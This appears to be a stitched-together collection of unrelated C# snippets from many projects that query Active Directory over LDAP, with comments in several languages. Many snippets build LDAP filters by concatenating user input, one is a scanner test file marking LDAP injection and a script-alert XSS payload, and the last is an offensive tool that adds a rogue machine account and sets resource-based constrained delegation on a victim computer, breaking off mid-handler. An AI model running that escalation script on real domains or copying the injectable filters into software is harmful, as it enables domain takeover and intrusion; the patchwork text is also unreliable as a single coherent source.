private void btnLogin_Click(object sender, EventArgs e)
{
if (txtUserName.Text.Length == 0 || txtPassword.Text.Length == 0)
{
MessageBox.Show("用户名或者密码不能为空。", this.Text, MessageBoxButtons.OK, MessageBoxIcon.Warning);
return;
}
string directoryPath = "LDAP://" + GetDomainName();
string domainAndUsername = directoryPath + txtUserName.Text;
try
{
DirectoryEntry entry = new DirectoryEntry(directoryPath, txtUserName.Text, txtPassword.Text);
DirectorySearcher search = new DirectorySearcher(entry);
SearchResult result = search.FindOne();
MessageBox.Show("登录成功。", this.Text, MessageBoxButtons.OK, MessageBoxIcon.Information);
}
catch (Exception ex)
{
// 如果用户名或者密码不正确,也会抛出异常。
MessageBox.Show(ex.Message, this.Text, MessageBoxButtons.OK, MessageBoxIcon.Stop);
}
}
public static DirectoryEntry FindUser(string userName)
{
if (string.IsNullOrEmpty(LoginDomain) || !UseWindowsCreds && (string.IsNullOrEmpty(DomainName) || string.IsNullOrEmpty(Username) || string.IsNullOrEmpty(Password)))
{
if (EditADPrefs.Execute() != System.Windows.Forms.DialogResult.OK)
return null;
}
try
{
DirectoryEntry dom = null;
if (UseWindowsCreds)
dom = new DirectoryEntry("LDAP://" + DomainName);
else
dom = new DirectoryEntry("LDAP://" + DomainName, LoginDomain + @"\" + Username, Password, AuthenticationTypes.None);
using (DirectorySearcher dsSearcher = new DirectorySearcher(dom))
{
dsSearcher.Filter = string.Format("(&(objectClass=user)(|(cn={0})(samaccountname={0})))", userName);
dsSearcher.PropertiesToLoad.Add("ThumbnailPhoto");
SearchResult result = dsSearcher.FindOne();
if (result == null || string.IsNullOrEmpty(result.Path))
return null;
if (UseWindowsCreds)
return new DirectoryEntry(result.Path);
return new DirectoryEntry(result.Path, LoginDomain + @"\" + Username, Password, AuthenticationTypes.None);
}
}
catch (Exception e)
{
MessageBox.Show(string.Format("Failed to search for user.\r\n\r\nError was:\r\n{0}", e.Message), "A/D Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
return null;
}
public bool IsAuthenticated(string domain, string username, string pwd)
{
string domainAndUsername = domain + "\\" + username;
DirectoryEntry entry = new DirectoryEntry(_path, domainAndUsername, pwd);
try {
//Bind to the native AdsObject to force authentication.
object obj = entry.NativeObject;
DirectorySearcher search = new DirectorySearcher(entry);
search.Filter = "(SAMAccountName=" + username + ")";
search.PropertiesToLoad.Add("cn");
SearchResult result = search.FindOne();
if ((result == null)) {
return false;
}
//Update the new path to the user in the directory.
_path = result.Path;
_filterAttribute = Convert.ToString(result.Properties["cn"][0]);
} catch (Exception ex) {
throw new Exception("Error authenticating user. " + ex.Message);
}
return true;
}
public LdapUser(DirectoryEntry adentry, String userName, LdapSettings ldapSettings)
{
userid = new LdapAttribute("userid", userName);
DirectorySearcher ds = new DirectorySearcher(adentry);
ds.Filter = "(&(sAMAccountName=" + userName + "))";
SearchResult result = ds.FindOne();
DirectoryEntry ent = null;
if (result != null)
{
ent = result.GetDirectoryEntry();
}
if (ent != null)
{
if (ent.Properties["cn"].Value != null)
{
commonname = new LdapAttribute("commonname", ent.Properties["cn"].Value.ToString());
}
else
{
commonname = new LdapAttribute("commonname", userName);
}
if (ent.Properties["mail"].Value != null)
{
email = new LdapAttribute("email", ent.Properties["mail"].Value.ToString());
}
else
{
email = new LdapAttribute("email", userName + "@" + ldapSettings.Domain);
}
}
}
public Int32 getNextUID()
{
checkConnection();
Int32 id = 0;
DirectorySearcher mySearcher = new DirectorySearcher(entry);
mySearcher.Filter = "(|(objectClass=user))";
SearchResultCollection resultSet = mySearcher.FindAll();
foreach (SearchResult result in resultSet)
{
DirectoryEntry user = result.GetDirectoryEntry();
if (user.Properties["uidnumber"].Value != null)
{
String foo = user.Properties["uidnumber"].Value.ToString();
String username = user.Properties["uid"].Value.ToString();
int thisID;
Int32.TryParse(foo, out thisID);
if (thisID > id){
id = thisID;
}
}
}
mySearcher.Dispose();
return (id != 0) ? (id + 1) : 0;
}
/// <summary>
/// �������û�������
/// </summary>
/// <param name="UserName">���û���</param>
/// <param name="OldPassword">������</param>
/// <param name="NewPassword">������</param>
/// <param name="DomainName">DNS����</param>
/// <returns>�ɹ������棬���ɹ����ؼ�</returns>
public static bool ChangePassword(string UserName, string OldPassword, string NewPassword, string DomainName)
{
try
{
string UserPrincipalName = UserName + "@" + DomainName;
DirectoryEntry deRootDSE = new DirectoryEntry("LDAP://RootDSE", UserPrincipalName, OldPassword, AuthenticationTypes.Secure);
DirectoryEntry deDomain = new DirectoryEntry("LDAP://" + deRootDSE.Properties["defaultNamingContext"].Value.ToString(), UserPrincipalName, OldPassword, AuthenticationTypes.Secure);
DirectorySearcher dsSearcher = new DirectorySearcher();
dsSearcher.SearchRoot = deDomain;
dsSearcher.SearchScope = SearchScope.Subtree;
dsSearcher.Filter = "(userPrincipalName=" + UserPrincipalName + ")";
SearchResult srResult = dsSearcher.FindOne();
if (srResult != null)
{
DirectoryEntry deUser = new DirectoryEntry(srResult.GetDirectoryEntry().Path, UserPrincipalName, OldPassword, AuthenticationTypes.Secure);
deUser.Invoke("ChangePassword", new object[] { OldPassword, NewPassword });
deUser.CommitChanges();
return true;
}
else
return false;
}
catch //(Exception ex)
{
return false;// ex.Message;
}
}
protected void Page_Load(object sender, EventArgs e)
{
// TODO this todo was here for ages
var dc = new DirectoryContext(DirectoryContextType.Domain, "ptsecurity.ru");
var address = Request.Params["address"];
var filter = "Address=" + address;
var result = "";
var domain = Domain.GetDomain(dc);
// this is our vulnerabilitiy of LDAP injection *in this file*
// FIXED: AI issue #3, High, LDAP Injection, https://github.com/SDLTestAccount/IT/issues/3
// GET /Tests/1 INPUT DATA VERIFICATION/9 LDAP Injection/Ldap.aspx?address=%7bfilter%7d+%3d+* HTTP/1.1
// Host:localhost
var ds = new DirectorySearcher(domain.GetDirectoryEntry());//, filter);
using (var src = ds.FindAll())
{
// TODO it was edit here by developer 1 year ago
foreach (var res in src)
{
result = res.ToString();
}
}
// let's go
// this is our first vulnerability of XSS in this file
// we will demonstrate False Positive scenario here (FP Marker)
// FP: AI issue #4, High, Cross-site Scripting, https://github.com/SDLTestAccount/IT/issues/4
// GET /Tests/1 INPUT DATA VERIFICATION/9 LDAP Injection/Ldap.aspx HTTP/1.1
// Host:localhost
// (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().MoveNext() && (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().Current.ToString() == "<script>alert(0)</script>"))
Response.Write(result);
// this is our second vulnerability of XSS in this file
// we will demonstrate what happen if developer fails with his fix (VERIFY Marker)
// FIXED: AI issue #4, High, Cross-site Scripting, https://github.com/SDLTestAccount/IT/issues/4
// GET /Tests/1 INPUT DATA VERIFICATION/9 LDAP Injection/Ldap.aspx HTTP/1.1
// Host:localhost
// (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().MoveNext() && (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().Current.ToString() == "<script>alert(0)</script>"))
Response.Write("result");
// this is our third vulnerability of XSS in this file
// we will demonstrate what happen if we really fix vulnerability (VERIFY Marker)
// FIXED: AI issue #4, High, Cross-site Scripting, https://github.com/SDLTestAccount/IT/issues/4
// GET /Tests/1 INPUT DATA VERIFICATION/9 LDAP Injection/Ldap.aspx HTTP/1.1
// Host:localhost
// (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().MoveNext() && (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().Current.ToString() == "<script>alert(0)</script>"))
Response.Write("result");
// this is our fourth vulnerability of XSS in this file
// we will demonstrate what happen if developer want to cheat (FIXED Marker)
// FIXED: AI issue #4, High, Cross-site Scripting, https://github.com/SDLTestAccount/IT/issues/4
// GET /Tests/1 INPUT DATA VERIFICATION/9 LDAP Injection/Ldap.aspx HTTP/1.1
// Host:localhost
// (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().MoveNext() && (System.DirectoryServices.DirectorySearcher.FindAll().GetEnumerator().Current.ToString() == "<script>alert(0)</script>"))
Response.Write("result");
}
public bool GetStatus()
{
DirectorySearcher search = new DirectorySearcher(_path);
search.Filter = "(cn=" + _filterAttribute + ")";
search.PropertiesToLoad.Add("userAccountControl");
try
{
SearchResult result = search.FindOne();
if (null == result)
{
return false;
}
string statusNames = result.Properties["userAccountControl"][0].ToString();
if ("512".Equals(statusNames))
{
return true;
}
// 512 可用账户
// 514 账户无效
// 528 账户锁定
// 8389120 密码过期
return false;
}
catch (Exception ex)
{
return false;
//throw new Exception("Error obtaining userAccountControl names. " + ex.Message);
}
}
public override DirectoryObject GetDirectoryObjectById(string id) {
if(id == null) {
throw new ArgumentNullException("id");
}
DirectoryObject directoryObject = null;
if(id.Length > 0) {
using(DirectoryEntry directoryEntry = this.GetDirectoryEntry()) {
using(DirectorySearcher directorySearcher = new DirectorySearcher(
directoryEntry,
string.Format(CultureInfo.InvariantCulture, FilterAndFormat, BaseFilter + string.Format(CultureInfo.InvariantCulture, FilterFormat, this.IdentifyingPropertyName, id)),
PropertyNames,
SearchScope.Subtree)) {
SearchResult searchResult = directorySearcher.FindOne();
if(searchResult != null) {
directoryObject = this.CreateDirectoryObjectInstance();
directoryObject.Id = GetPropertyValue(searchResult, this.IdentifyingPropertyName);
foreach(string propertyName in searchResult.Properties.PropertyNames) {
if(directoryObject.Contains(propertyName)) {
directoryObject[propertyName] = GetPropertyValue(searchResult, propertyName);
}
}
}
}
}
}
return directoryObject;
}
public static UserEntity FindUserByLogin(string login)
{
// Parse the string to check if domain name is present.
int idx = login.IndexOf('\\');
if (idx == -1)
{
idx = login.IndexOf('@');
}
string strName = idx != -1 ? login.Substring(idx + 1) : login;
const string connection = "LDAP://softserveinc.com";
var dssearch = new DirectorySearcher(connection) { Filter = "(sAMAccountName=" + strName + ")" };
var sresult = dssearch.FindOne();
DirectoryEntry dsresult = sresult.GetDirectoryEntry();
var result = new UserEntity
{
Login = "******" + login,
Name = dsresult.Properties["displayName"][0].ToString(),
Mail = dsresult.Properties["mail"][0].ToString(),
Department = dsresult.Properties["department"][0].ToString(),
Office = dsresult.Properties["physicalDeliveryOfficeName"][0].ToString()
};
return result;
}
// potentially not needed due to use of the role provider
public string GetGroups()
{
DirectorySearcher search = new DirectorySearcher(_path);
search.Filter = "(cn=" + _filterAttribute + ")";
search.PropertiesToLoad.Add("memberOf");
StringBuilder groupNames = new StringBuilder();
try
{
SearchResult result = search.FindOne();
int propertyCount = result.Properties["memberOf"].Count;
string dn;
int equalsIndex, commaIndex;
for (int propertyCounter = 0; propertyCounter < propertyCount; propertyCounter++)
{
dn = (string)result.Properties["memberOf"][propertyCounter];
equalsIndex = dn.IndexOf("=", 1);
commaIndex = dn.IndexOf(",", 1);
if (-1 == equalsIndex)
{
return null;
}
groupNames.Append(dn.Substring((equalsIndex + 1), (commaIndex - equalsIndex) - 1));
groupNames.Append("|");
}
}
catch (Exception ex)
{
throw new Exception("Error obtaining group names. " + ex.Message);
}
return groupNames.ToString();
}
private static bool AuthenticateUser(string credentials)
{
var encoding = Encoding.GetEncoding("iso-8859-1");
credentials = encoding.GetString(Convert.FromBase64String(credentials));
var credentialsArray = credentials.Split(':');
var username = credentialsArray[0];
var password = credentialsArray[1];
if (string.IsNullOrEmpty(username))
{
return false;
}
var directoryEntry = new DirectoryEntry(Ldap, username, password);
var searchAdForUser = new DirectorySearcher(directoryEntry) { Filter = "(&(objectClass=user)(anr=" + username + "))" };
var retrievedUser = searchAdForUser.FindOne();
if (retrievedUser == null)
{
return false;
}
var identity = new GenericIdentity(username);
SetPrincipal(new GenericPrincipal(identity, null));
return true;
}
/// <summary>
/// Checks the name of the user.
/// </summary>
/// <param name="entry">The entry.</param>
/// <param name="userName">Name of the user.</param>
/// <returns>
/// <c>true</c> if user name is existed, <c>false</c> otherwise.</returns>
public static bool CheckUserName(this DirectoryEntry entry, string userName)
{
try
{
entry.CheckNullObject("entry");
userName.CheckEmptyString("userName");
var directorySearcher = new DirectorySearcher()
{
SearchRoot = entry,
Filter = "(&(objectClass=user) (cn=" + userName + "))"
};
if ((directorySearcher.FindAll()?.Count ?? 0) > 0)
{
return true;
};
return false;
}
catch (Exception ex)
{
throw ex.Handle( new { userName });
}
}
//- Método que valida el usuario en el Active Directory
public bool ValidarUsuarioActiveDirectory(string _Path, string userId, string password)
{
DirectoryEntry deEntry = new DirectoryEntry(_Path, userId, password);
DirectorySearcher dsSearcher = new DirectorySearcher(deEntry);
bool bandera = false;
try
{
UsuarioId(userId);
dsSearcher.Filter = "(SAMAccountName=" + w_UserAD.Trim() + ")";
dsSearcher.PropertiesToLoad.Add("cn");
SearchResult result = dsSearcher.FindOne();
if (!string.IsNullOrEmpty(result.ToString()))
{
bandera = true;
}
else
{
bandera = false;
}
_path = result.Path;
_filterAttribute = (String)result.Properties["cn"][0];
}
catch (Exception)
{
return false;
}
return bandera;
}
public AdUser GetUserById(string id)
{
try
{
DirectoryEntry entry = new DirectoryEntry("LDAP://infotecs-nt");
string managerDN;
AdUser user;
using (DirectorySearcher dSearch = new DirectorySearcher(entry))
{
dSearch.Filter = string.Format("(&(objectCategory=person)(objectClass=user)(samaccountname={0}))", id);
var result = dSearch.FindOne();
user = MapUserFromAdResult(result);
managerDN = (string)result.Properties["manager"][0];
}
using (DirectorySearcher dSearch = new DirectorySearcher(entry))
{
dSearch.Filter = string.Format("(&(objectCategory=person)(objectClass=user)(distinguishedname={0}))", managerDN);
var result = dSearch.FindOne();
var manager = MapUserFromAdResult(result);
user.Manager = manager;
}
return user;
}
catch
{
}
return null;
}
private static SearchResultCollection GetUsers(DirectoryEntry ad, string ldapFilter)
{
var search = new DirectorySearcher(ad, ldapFilter);
search.SearchScope = AppSettings.GeneralSettings.SearchScope;
var results = search.FindAll();
return results;
}
private void RequesterEmail_comboBox_SelectedIndexChanged(object sender, EventArgs e)
{
// Get user first name and last name by email
string mail = RequesterEmail_comboBox.Text;
DirectoryEntry entry = new DirectoryEntry();
DirectorySearcher adsearcher = new DirectorySearcher(entry);
adsearcher.Filter = "(&(objectClass=user)(mail=" + mail + "))";
adsearcher.PropertiesToLoad.Add("givenName");
adsearcher.PropertiesToLoad.Add("sn");
adsearcher.PropertiesToLoad.Add("mail");
SearchResult result = adsearcher.FindOne();
if (result == null)
MessageBox.Show("Email Does Not Exist !!" + Environment.NewLine + "Please Check Your Spelling !!");
if (result != null)
{
DirectoryEntry employee = result.GetDirectoryEntry();
string FirstName = employee.Properties["givenName"].Value.ToString();
string LastName = employee.Properties["sn"].Value.ToString();
RequesterFirstName_txtBox.Text = FirstName;
RequesterLastName_txtBox.Text = LastName;
}
}
private List<ADDomain> GetNetBIOSDomains()
{
List<ADDomain> ret = new List<ADDomain>();
DirectoryEntry RootDSE = new DirectoryEntry("LDAP://rootDSE");
// Retrieve the Configuration Naming Context from RootDSE
string configNC = RootDSE.Properties["configurationNamingContext"].Value.ToString();
// Connect to the Configuration Naming Context
DirectoryEntry configSearchRoot = new DirectoryEntry("LDAP://" + configNC);
// Search for all partitions where the NetBIOSName is set.
DirectorySearcher configSearch = new DirectorySearcher(configSearchRoot);
configSearch.Filter = ("(NETBIOSName=*)");
// Configure search to return dnsroot and ncname attributes
configSearch.PropertiesToLoad.Add("dnsroot");
configSearch.PropertiesToLoad.Add("NETBIOSName");
SearchResultCollection forestPartitionList = configSearch.FindAll();
// Loop through each returned domain in the result collection
foreach (SearchResult domainPartition in forestPartitionList)
{
ADDomain ad = new ADDomain();
ad.Name = domainPartition.Properties["NETBIOSName"][0].ToString();
ad.Path = domainPartition.Properties["NETBIOSName"][0].ToString();
ret.Add(ad);
}
return ret;
}
public static string FindAccountByEmail(string pEmailAddress)
{
string filter = string.Format("(proxyaddresses=SMTP:{0})", pEmailAddress);
using (DirectoryEntry gc = new DirectoryEntry("GC:"))
{
foreach (DirectoryEntry z in gc.Children)
{
using (DirectoryEntry root = z)
{
using (DirectorySearcher searcher = new DirectorySearcher(root, filter, new string[] { "mailNickname" }))
{
searcher.ReferralChasing = ReferralChasingOption.All;
SearchResultCollection result = searcher.FindAll();
foreach (SearchResult item in result)
{
foreach (object value in item.Properties["mailNickName"])
{
return value.ToString();
}
}
}
}
}
}
return null;
}
public bool Authenticate(string userName, string pwd)
{
//Get an entry to Active Directory
using (DirectoryEntry dirEntry = CreateDirectoryEntry(userName, pwd))
{
//Instansiate a new Active Directory searcher, set filter and properties
using (DirectorySearcher dirSearcher = new DirectorySearcher(dirEntry))
{
//Set search filter
dirSearcher.Filter = "(sAMAccountName=" + userName + ")";
SearchResult searchResult;
try
{
searchResult = dirSearcher.FindOne();
}
catch (Exception err)
{
//The domain is not available or the client do not have permission to do the search.
//Check userName and/or passWord.
return false;
}
if (searchResult != null)
{
//User exist in Active Directory.
return true;
}
//User does not exist in Active Directory.
return false;
}
}
}
public static List<string> GetDomainList2()
{
List<string> domainList = new List<string>();
string sRootDomain;
System.DirectoryServices.DirectoryEntry deRootDSE;
System.DirectoryServices.DirectoryEntry deSearchRoot;
System.DirectoryServices.DirectorySearcher dsFindDomains;
System.DirectoryServices.SearchResultCollection srcResults;
deRootDSE = new System.DirectoryServices.DirectoryEntry("GC://RootDSE");
sRootDomain = "GC://" + deRootDSE.Properties["rootDomainNamingContext"].Value.ToString();
deSearchRoot = new System.DirectoryServices.DirectoryEntry(sRootDomain);
dsFindDomains = new System.DirectoryServices.DirectorySearcher(deSearchRoot);
dsFindDomains.Filter = "(objectCategory=domainDNS)";
dsFindDomains.SearchScope = System.DirectoryServices.SearchScope.Subtree;
srcResults = dsFindDomains.FindAll();
foreach (System.DirectoryServices.SearchResult srDomain in srcResults)
{
domainList.Add(srDomain.Properties["name"][0].ToString());
}
return domainList;
}
public List<User> GetADUsers()
{
try
{
List<User> AdUsers = new List<User>();
string domainPath = "LDAP://OU=Users,OU=Cobweb Solutions Ltd,DC=cobwebsolutions,DC=com";
DirectoryEntry searchroot = new DirectoryEntry(domainPath);
DirectorySearcher search = new DirectorySearcher(searchroot);
search.Filter = "(&(objectClass=user)(objectCategory=person))";
search.PropertiesToLoad.Add("samaccountname");
search.PropertiesToLoad.Add("displayname");
SearchResult result;
SearchResultCollection resultCol = search.FindAll();
if (resultCol != null)
{
for (int i = 0; i < resultCol.Count; i++)
{
result = resultCol[i];
User adUser = new User();
adUser.DisplayName = (string)result.Properties["displayname"][0];
adUser.UserName = (string)result.Properties["samaccountname"][0];
AdUsers.Add(adUser);
}
}
return AdUsers;
}
catch (Exception ex)
{
return null;
}
}
public static Task Test()
{
return Task.Run(() => {
string strServerDNS = "ldap.hp.com:389";
string strSearchBaseDN = "ou=Email,ou=Services,o=hp.com";
string strLDAPPath;
strLDAPPath = "LDAP://" + strServerDNS + "/" + strSearchBaseDN;
DirectoryEntry objDirEntry = new DirectoryEntry(strLDAPPath, null, null, AuthenticationTypes.Anonymous);
DirectorySearcher searcher = new DirectorySearcher(objDirEntry);
SearchResult result = null;
searcher.Filter = "[email protected]";
searcher.PropertiesToLoad.Add("ntUserDomainId");
searcher.ClientTimeout = TimeSpan.FromSeconds(20);
try
{
result = searcher.FindOne();
}
catch (Exception ex)
{
}
finally
{
searcher.Dispose();
}
});
}
public static List<string> GetComputers()
{
List<string> ComputerNames = new List<string>();
DirectoryEntry entry = new DirectoryEntry("LDAP://transnetwork.local/OU=Phoenix-DC,DC=transnetwork,DC=local");
DirectorySearcher mySearcher = new DirectorySearcher(entry);
mySearcher.Filter = ("(objectClass=computer)"); //se buscan solamente objetos de ltipo computadora / server
mySearcher.SizeLimit = int.MaxValue;
mySearcher.PageSize = int.MaxValue;
foreach (SearchResult resEnt in mySearcher.FindAll())
{
//"CN=SGSVG007DC"
string ComputerName = resEnt.GetDirectoryEntry().Name;
if (ComputerName.StartsWith("CN="))
ComputerName = ComputerName.Remove(0, "CN=".Length);
ComputerNames.Add(ComputerName);
}
mySearcher.Dispose();
entry.Dispose();
// Console.ReadLine();
return ComputerNames;
}
public void DirectorySearcherPrerequisiteTest()
{
using(DirectorySearcher directorySearcher = new DirectorySearcher())
{
Assert.IsNotNull(directorySearcher.Filter);
Assert.AreEqual(0, directorySearcher.PropertiesToLoad.Count);
Assert.AreEqual(SearchScope.Subtree, directorySearcher.SearchScope);
// Assert.IsNotNull(directorySearcher.SearchRoot); // This only works when the computer you run the unit tests on is on a domain.
}
using(DirectorySearcher directorySearcher = new DirectorySearcher((DirectoryEntry) null))
{
Assert.IsNotNull(directorySearcher.Filter);
Assert.AreEqual(0, directorySearcher.PropertiesToLoad.Count);
Assert.AreEqual(SearchScope.Subtree, directorySearcher.SearchScope);
// Assert.IsNotNull(directorySearcher.SearchRoot); // This only works when the computer you run the unit tests on is on a domain.
}
using(DirectorySearcher directorySearcher = new DirectorySearcher((string) null))
{
Assert.IsNull(directorySearcher.Filter);
Assert.AreEqual(0, directorySearcher.PropertiesToLoad.Count);
Assert.AreEqual(SearchScope.Subtree, directorySearcher.SearchScope);
// Assert.IsNotNull(directorySearcher.SearchRoot); // This only works when the computer you run the unit tests on is on a domain.
}
}
public override string[] GetRolesForUser(string username)
{
var allRoles = new List<string>();
var root = new DirectoryEntry(ConfigurationManager.ConnectionStrings[ConnectionStringName].ConnectionString,
ConnectionUsername, ConnectionPassword);
var searcher = new DirectorySearcher(root, String.Format(CultureInfo.InvariantCulture,
"(&(objectClass=user)({0}={1}))", AttributeMapUsername, username));
searcher.PropertiesToLoad.Add("memberOf");
SearchResult result = searcher.FindOne();
if (result != null && !string.IsNullOrEmpty(result.Path))
{
DirectoryEntry user = result.GetDirectoryEntry();
PropertyValueCollection groups = user.Properties["memberOf"];
foreach (string path in groups)
{
string[] parts = path.Split(',');
if (parts.Length > 0)
{
foreach (string part in parts)
{
string[] p = part.Split('=');
if (p[0].Equals("cn", StringComparison.OrdinalIgnoreCase))
{
allRoles.Add(p[1]);
}
}
}
}
}
return allRoles.ToArray();
}
/// <summary>
/// Получить всех пользователей.
/// </summary>
/// <returns></returns>
public List<AdUser> GetAllUsers()
{
DirectoryEntry entry = new DirectoryEntry("LDAP://infotecs-nt");
List<AdUser> users = new List<AdUser>();
using (DirectorySearcher dSearch = new DirectorySearcher(entry))
{
dSearch.Filter = "(&(objectCategory=person)(objectClass=user))";
var allResults = dSearch.FindAll();
foreach (SearchResult result in allResults)
{
if (result.Properties["extensionattribute14"].Count == 0
|| (result.Properties["mail"].Count == 0)
|| (result.Properties["department"].Count == 0)
|| (result.Properties["title"].Count == 0))
{
continue;
}
var user = MapUserFromAdResult(result); ;
if (user != null)
{
users.Add(user);
}
}
}
return users;
}
static public void getGrups(string username, string group_Admin)
{
try
{
// string filter = string.Format("(&(ObjectClass={0})(sAMAccountName={1}))", "person", "afanasievdv");
string domain = "isea.ru";
string[] properties = new string[] { "fullname" };
// username = "******";
DirectoryEntry adRoot = new DirectoryEntry("LDAP://" + domain, null, null, AuthenticationTypes.Secure);
DirectorySearcher dirsearcher = new DirectorySearcher(adRoot);
dirsearcher.Filter = string.Format("(&(ObjectClass={0})(sAMAccountName={1}))", "person", username);
dirsearcher.PropertiesToLoad.Add("memberOf");
int propCount;
SearchResult dirSearchResults = dirsearcher.FindOne();
propCount = dirSearchResults.Properties["memberOf"].Count;
DirectoryEntry directoryEntry = dirSearchResults.GetDirectoryEntry();
// string dn, equalsIndex, commaIndex;
PropertyValueCollection groups = directoryEntry.Properties["memberOf"];
foreach (string g in groups)
{
string group = g.Split('=')[1].Split(',')[0];
System.Diagnostics.Debug.WriteLine(group);
}
}
catch (Exception ex)
{
System.Diagnostics.Debug.WriteLine(ex.ToString());
}
}
private void InitializeComponent()
{
this.directorySearcher1 = new System.DirectoryServices.DirectorySearcher();
this.button1 = new System.Windows.Forms.Button();
this.button2 = new System.Windows.Forms.Button();
this.button3 = new System.Windows.Forms.Button();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.SuspendLayout();
//
// directorySearcher1
//
this.directorySearcher1.ClientTimeout = System.TimeSpan.Parse("-00:00:01");
this.directorySearcher1.ServerPageTimeLimit = System.TimeSpan.Parse("-00:00:01");
this.directorySearcher1.ServerTimeLimit = System.TimeSpan.Parse("-00:00:01");
//
// button1
//
this.button1.Location = new System.Drawing.Point(62, 51);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(137, 41);
this.button1.TabIndex = 3;
this.button1.Text = "button1";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new System.EventHandler(this.button1_Click);
this.pictureBox1.Location = new System.Drawing.Point(46, 37);
this.pictureBox1.Name = "pictureBox1";
string PfadBild = @"C:\Bildverarbeitung\C#-FormsMitDerHand_IP\lena_std.tif";
StreamReader SR = new StreamReader(PfadBild);
Bitmap Bild = new Bitmap(SR.BaseStream);
SR.Close();
this.pictureBox1.Size = new System.Drawing.Size(Bild.Size.Width, Bild.Size.Height);
this.pictureBox1.Image = Bild;
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(711, 442);
//this.Controls.Add(this.button1);
this.Controls.Add(this.pictureBox1);
this.Name = "Form1";
this.Text = "Form1";
this.Load += new System.EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
static void Main(string[] args)
{
String DomainController = "192.168.127.129";
String Domain = "gh0st.com";
//String username = args[0]; //域用户名
//String password = args[1]; //域用户密码
String new_MachineAccount = "evilpc"; //添加的机器账户
String new_MachineAccount_password = "******"; //机器账户密码
String victimcomputer_ldap_path = "LDAP://CN=Computers,DC=gh0st,DC=com";
String machine_account = new_MachineAccount;
String sam_account = machine_account + "$";
String distinguished_name = "";
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
}
Console.WriteLine("[+] Elevate permissions on ");
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
//Console.WriteLine("[+] New SAMAccountName = " + sam_account);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
try {
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
} catch (System.Exception ex) {
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try {
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
} catch {
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("redteam.com");
myldapConnection.Path = victimcomputer_ldap_path;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
//通过ldap找计算机
search.Filter = "(CN=" + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try {
result = search.FindOne();
} catch (System.Exception ex) {
Console.WriteLine(ex.Message + "Exiting...");
return;
}
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
String sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] descriptor_buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(descriptor_buffer, 0);
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
try {
entryToUpdate.CommitChanges();//提交更改
Console.WriteLine("[+] Exploit successfully!");
} catch (System.Exception ex) {
